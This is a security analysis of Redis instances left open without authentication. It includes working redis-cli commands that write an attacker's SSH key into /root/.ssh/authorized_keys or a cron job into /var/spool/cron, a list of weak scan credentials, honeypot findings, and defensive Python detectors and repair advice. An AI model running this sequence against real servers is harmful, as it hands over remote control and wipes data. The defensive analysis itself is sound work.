Comprehensive Analysis of Redis events


0x00 Preface

Unauthorized access to Redis received little attention until November 4, when a blog post showed that Redis could be used to take control of a server by writing an SSH key. Since then security staff have been paying close attention to this incident.

0x01 Vulnerability Overview

A Redis instance exposed to the public network can be logged on to by attackers if authentication is not enabled or if a weak password is used. Attackers can then take control of the server by writing an SSH public key or by writing a crontab entry that executes commands.

0x02 Impact

Baidu titan.com scanned the whole Internet for Redis on the default port. After two days of data comparison, it is clear that Redis security has received little attention from the parties running it.

 

The weak credentials used for the scan were as follows:

Usernames: root, admin, redis, administrator, webadmin, sysadmin, netadmin

Passwords: 123456, 12345, 123456789, password, iloveyou, redis, root, admin, 12345678, 1234567

Redis status in China:

China is the most affected country. The main data is as follows:

 

Distribution of major cities with unauthorized access to redis in China:

 

0x03 Vulnerability Exploitation

Method 1:

Use the Redis SET command to write your own SSH public key into the user's .ssh directory, which enables SSH login without a password.

$ ssh-keygen -t rsa                                      // generate the key pair
$ (echo -e "\n"; cat id_rsa.pub; echo -e "\n") > foo.txt  // pad the public key with newlines so it stays on its own line inside the dump file
$ redis-cli -h 192.168.1.11 flushall                     // delete all databases and keys so the dump contains nothing but our data (use with caution)
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit // write the key as the value of the "crackit" key
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /root/.ssh/            // set the save path
192.168.1.11:6379> config set dbfilename "authorized_keys" // set the database file name
192.168.1.11:6379> save

Saving the database to /root/.ssh/authorized_keys overwrites the previous authorized_keys, so any passwordless login that was configured before stops working.

Method 2:

Write the payload into a crontab file for execution.

Run set 1 'xxx' in Redis so that the data is written at the start of the dump; the write succeeds even though the resulting file is bulky (source: pig @ wooyun).

Crontab has loose requirements on the format of the file it executes, so the binary dump around the cron line does not stop it.

On CentOS, write the data into the /var/spool/cron directory.

For the remaining steps, refer to Method 1.

0x04 Vulnerability Tracking

In our self-deployed honeypot we use the Redis MONITOR command to record every command the instance receives.

redis-cli -h xx.xx.xx. monitor >ksdf.log

Then watch the log.
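The log produced this way can be searched automatically for the write sequence described in Method 1 and Method 2. The following detector is an added example, not code from the original post or from the honeypot: it parses redis-cli MONITOR lines, groups the stages of the dump-file takeover (flushall, a key or cron line stored as a value, dir pointed at an SSH or cron directory, dbfilename changed, save) per client address, and reports clients that hit the redirecting stages. The log lines are constructed; 46.151.53.230 is the address mentioned on the page.

```python
import re

# One redis-cli MONITOR line: <unix ts> [<db> <client ip:port>] "cmd" "arg" ...
LINE_RE = re.compile(r'^\d+\.\d+ \[\d+ (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Dump locations abused in this incident: SSH key and crontab directories.
SENSITIVE_DIRS = ('/.ssh', '/var/spool/cron', '/etc/cron')
def classify(args):
    """Map one command to the stage of the dump-file takeover it belongs to, or None."""
    if not args:
        return None
    cmd, sub = args[0].lower(), (args[1].lower() if len(args) > 1 else '')
    if cmd == 'flushall':
        return 'flushall'
    if cmd == 'config' and sub == 'set' and len(args) > 3:
        if args[2].lower() == 'dir' and any(d in args[3] for d in SENSITIVE_DIRS):
            return 'dir'
        if args[2].lower() == 'dbfilename':  # applications never rename the dump at runtime
            return 'dbfilename'
    if cmd == 'set' and len(args) > 2 and (
            'ssh-rsa' in args[2] or re.search(r'(\*\s+){4}\*', args[2])):
        return 'payload'  # an SSH public key or a cron line stored as a value
    if cmd in ('save', 'bgsave'):
        return 'save'
    return None

def scan_monitor_log(lines):
    """Return {client: set of stages} for every client that hit at least one stage."""
    stages = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        stage = classify(ARG_RE.findall(m.group('rest'))) if m else None
        if stage:
            stages.setdefault(m.group('client'), set()).add(stage)
    return stages

def takeover_clients(lines):
    """Clients that redirected the dump file or stored an SSH key / cron line."""
    return sorted(c for c, s in scan_monitor_log(lines).items()
                  if s & {'dir', 'dbfilename', 'payload'})

# Constructed sample, not a real capture; 46.151.53.230 is the address named on the page.
SAMPLE_LOG = [
    r'1447039480.531642 [0 46.151.53.230:41234] "flushall"',
    r'1447039481.102311 [0 46.151.53.230:41234] "set" "crackit" "\n\nssh-rsa AAAAB3Nza CONSTRUCTED\n\n"',
    r'1447039482.211900 [0 46.151.53.230:41234] "config" "set" "dir" "/root/.ssh/"',
    r'1447039483.002100 [0 46.151.53.230:41234] "config" "set" "dbfilename" "authorized_keys"',
    r'1447039484.330050 [0 46.151.53.230:41234] "save"',
    r'1447039490.000001 [0 10.0.0.5:50001] "get" "session:abc"',
]
```

Feed it the lines of ksdf.log (for example with `takeover_clients(open('ksdf.log'))`); a single `config set dir` or `config set dbfilename` from a remote client is already worth an alert, since normal applications never issue them.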

One honeypot captured an intrusion command within one hour.

 

Greetings from our Ukrainian compatriot 46.151.53.230. This IP address appears in the proxy list we collected, so it may be nothing more than a stepping-stone machine.

The Public Key is as follows:


Other public keys obtained are as follows:


Summary:

Because each Redis save overwrites the file, several hackers or groups have been competing for the final write.

If you find that your Redis instance has suddenly been cleared and contains only a "crackit" key or other strange keys, congratulations: you have been visited.

0x05 Repair Suggestions

1. Add authentication to your Redis instance. Do not expose it to the public network, and do not run Redis as root unless necessary.
2. Use iptables to allow only a whitelist of sources to reach the fixed port.
3. Inspect your authorized_keys files and crontab tasks. If an entry begins with REDIS (the header of a Redis dump file), reset it.
4. Run chkrootkit and Rootkit Hunter (rkhunter) to check for rootkits.
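Suggestion 3 can be automated: a file written by Redis SAVE always starts with the bytes "REDIS" followed by the RDB version, so authorized_keys and crontab files can be checked for that header. The scanner below is an added example, not code from the original post; it assumes per-user crontabs live in /var/spool/cron (as on CentOS, per the page) and that home directories are /root and /home/<user>. The demo builds a constructed directory tree in a temp dir so it runs without touching the real system.

```python
import os
import tempfile

RDB_MAGIC = b'REDIS'  # every Redis dump file starts with "REDIS" followed by the RDB version

def written_by_redis(path):
    """True if the file begins with the RDB header, i.e. it was produced by a Redis SAVE."""
    try:
        with open(path, 'rb') as f:
            return f.read(len(RDB_MAGIC)) == RDB_MAGIC
    except OSError:
        return False

def candidate_paths(root_home='/root', home_root='/home', cron_dir='/var/spool/cron'):
    """authorized_keys for root and every user under /home, plus every per-user crontab."""
    paths = [os.path.join(root_home, '.ssh', 'authorized_keys')]
    if os.path.isdir(home_root):
        for user in sorted(os.listdir(home_root)):
            paths.append(os.path.join(home_root, user, '.ssh', 'authorized_keys'))
    if os.path.isdir(cron_dir):
        for name in sorted(os.listdir(cron_dir)):
            paths.append(os.path.join(cron_dir, name))
    return paths

def find_rdb_written(paths):
    """Subset of paths whose content is an RDB dump rather than a hand-written file."""
    return [p for p in paths if written_by_redis(p)]

def demo():
    """Build a constructed home/cron tree in a temp dir and return what the scan flags."""
    base = tempfile.mkdtemp()
    home, cron = os.path.join(base, 'home'), os.path.join(base, 'cron')
    os.makedirs(os.path.join(home, 'alice', '.ssh'))
    os.makedirs(os.path.join(home, 'bob', '.ssh'))
    os.makedirs(cron)
    # alice: genuine key file; bob and root's crontab: RDB dumps with a payload inside (constructed bytes)
    with open(os.path.join(home, 'alice', '.ssh', 'authorized_keys'), 'wb') as f:
        f.write(b'ssh-rsa AAAAB3Nza CONSTRUCTED alice@example\n')
    with open(os.path.join(home, 'bob', '.ssh', 'authorized_keys'), 'wb') as f:
        f.write(b'REDIS0006\xfe\x00\x00\x07crackit\n\nssh-rsa AAAA CONSTRUCTED\n\n\xff')
    with open(os.path.join(cron, 'root'), 'wb') as f:
        f.write(b'REDIS0006\xfe\x00\x00\x011\n\n* * * * * /bin/sh CONSTRUCTED\n\n\xff')
    found = find_rdb_written(candidate_paths(os.path.join(base, 'none'), home, cron))
    return [os.path.relpath(p, base) for p in found]

if __name__ == '__main__':
    for p in find_rdb_written(candidate_paths()):
        print('RDB header found, reset this file:', p)
```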
